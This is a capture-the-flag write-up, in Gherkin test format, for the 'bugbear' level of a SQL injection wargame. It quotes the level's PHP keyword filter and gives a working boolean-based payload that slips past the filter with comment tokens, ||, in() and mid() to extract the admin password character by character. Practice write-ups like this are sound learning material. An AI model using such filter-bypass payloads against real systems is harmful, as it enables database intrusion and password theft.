## Version 2.0
## language: en

Feature: bugbear-sql-injection-lordofsqli
  Site:
    https://los.rubiya.kr/gate.php
  Category:
    SQL Injection
  User:
    john2104
  Goal:
    Login as admin

  Background:
  Hacker's software:
  | <Software name> | <Version>           |
  | Windows         | 10 Pro              |
  | Firefox         | 74.0 (64-bit)       |

  Machine information:
    Given the challenge URL
    """
    https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php
    """
    When I open the url with Chrome
    Then I see the PHP code that validates the password
    And It shows the query made on the screen
    """
    select id from prob_bugbear where id='guest' and pw='' and no=
    """
  Scenario: Fail:Sql-injection
    Given the PHP code
    And knowing that answer is correct when It returns:
    """
      BUGBEAR Clear!
    """
    When I try with the well known payload:
    """
      ?pw=a&no=123 or id like "admin"
    """
    Then I get "HeHe"
    And I didn't solve it

   Scenario: Success:Sqli-boolean-exploitation
    Given that I inspected the code
    And I see that they validate "'|substr|ascii|=|or|and| |like|0x" clauses
    And also to pass the challenge I need the actual admin password
    """
    if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");
    if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i',
    $_GET[no])) exit("HeHe");
    $_GET[pw] = addslashes($_GET[pw]);
    $query = "select pw from prob_bugbear where id='admin' and pw='
    {$_GET[pw]}'";
    if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear");
    """
    Then I used the following to bypass the protections
    And to iterate through characters to get the admin password
    """
    ?pw=1&no=123/**/||/**/(id/**/in("admin")/**%26%26/**/mid(pw,1,N)/**/in("A"))
    """
    Then I created a python script to find it using like [exploit.py]
    And I get the admin password
    Then I solve the challenge
